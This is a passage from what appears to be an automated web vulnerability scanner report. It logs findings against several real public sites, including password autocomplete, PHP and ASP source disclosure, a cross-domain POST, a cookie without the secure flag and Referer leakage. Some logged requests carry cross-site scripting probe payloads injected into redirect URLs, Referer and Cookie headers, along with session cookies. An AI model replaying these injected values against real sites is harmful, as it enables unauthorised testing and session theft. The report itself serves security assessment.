11.18. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>


<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9SQVM4ZjQ4NzUwMDAzLzI3MDg4MS9saQ!!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

11.19. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>
           <form name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9wTjJDeTcyMDgwMDAxLzI3MDg3OC9saQ!!/" method="POST" onsubmit="return validateForm();">
               <div id="error-message-login" class="error">
...[SNIP]...
</label>
    <input type="password" id="login_password" name="password" />
   
    <br class="clear" />
...[SNIP]...

11.20. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form method="get" action="/wps/portal/usa/membership">
                   
                   <input type="hidden" name="lastPage" value="/wps/portal/usa/rankings/individual" />
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

11.21. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:40 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ePZjGFgSahA9PBekBVGAWyf:140i3s34m; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 112414


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS8wRDBFUDUwNTkwMDAxLzI3MDIxNy9saQ!!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

11.22. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:40 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ePZjGFgSahA9PBekBVGAWyf:140i3s34m; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 112414


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS85RDBFUDUwNTkwMDAyLzI3MDIxOC9saQ!!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22"/>
...[SNIP]...
</label>
   <input id="UserPassword" name="password" type="password" value="" onfocus="clearField(this);" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="clearField(this);" />
   <label for="zip-code">
...[SNIP]...

11.23. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS82VTBoZjMwMTYwMDAyLzI3MDIxNC9saQ!!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/rankings/individual"/>
...[SNIP]...
</label>
   <input id="UserPassword" name="password" type="password" value="" onfocus="clearField(this);" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="clearField(this);" />
   <label for="zip-code">
...[SNIP]...

11.24. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS83VTBoZjMwMTYwMDAxLzI3MDIxMy9saQ!!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

12. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


12.1. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" />
...[SNIP]...

12.2. http://www.local.com/business/v3/js/globalbusiness_3_5.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.local.com
Path:   /business/v3/js/globalbusiness_3_5.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /business/v3/js/globalbusiness_3_5.js?v=4030_27585 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=41906
Expires: Thu, 20 Jan 2011 05:33:03 GMT
Date: Wed, 19 Jan 2011 17:54:37 GMT
Connection: close
Content-Length: 404232


ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
om.Toggle("listOptions","none");$_dom.Check("selAll");},OnLoad:function(){var that=pluck_account_reg4;if(that.debug)fb('acctRegDialog4: fn OnLoad');that.AddListeners();that.PrepareMailLinks();var CSk='<%#CloudSpongeConfig.Current.ApiKey %>';var CSp='<%#CloudSpongeConfig.Current.ApiSecret %>';setKeys(CSk,CSp);},PrepareMailLinks:function(){var that=pluck_account_reg4;if(that.debug)fb('acctRegDialog4: fn PrepareMailLinks');var mails=new Array("gmail","yahoo","msn","aol");for(var i=0;i<mails
...[SNIP]...

13. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 80578
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=2959
Expires: Wed, 19 Jan 2011 16:37:01 GMT
Date: Wed, 19 Jan 2011 15:47:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- else -->

<ti
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

14. SSL cookie without secure flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:20 GMT
Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 41558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...

15. Cross-domain Referer leakage  previous  next
There are 42 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

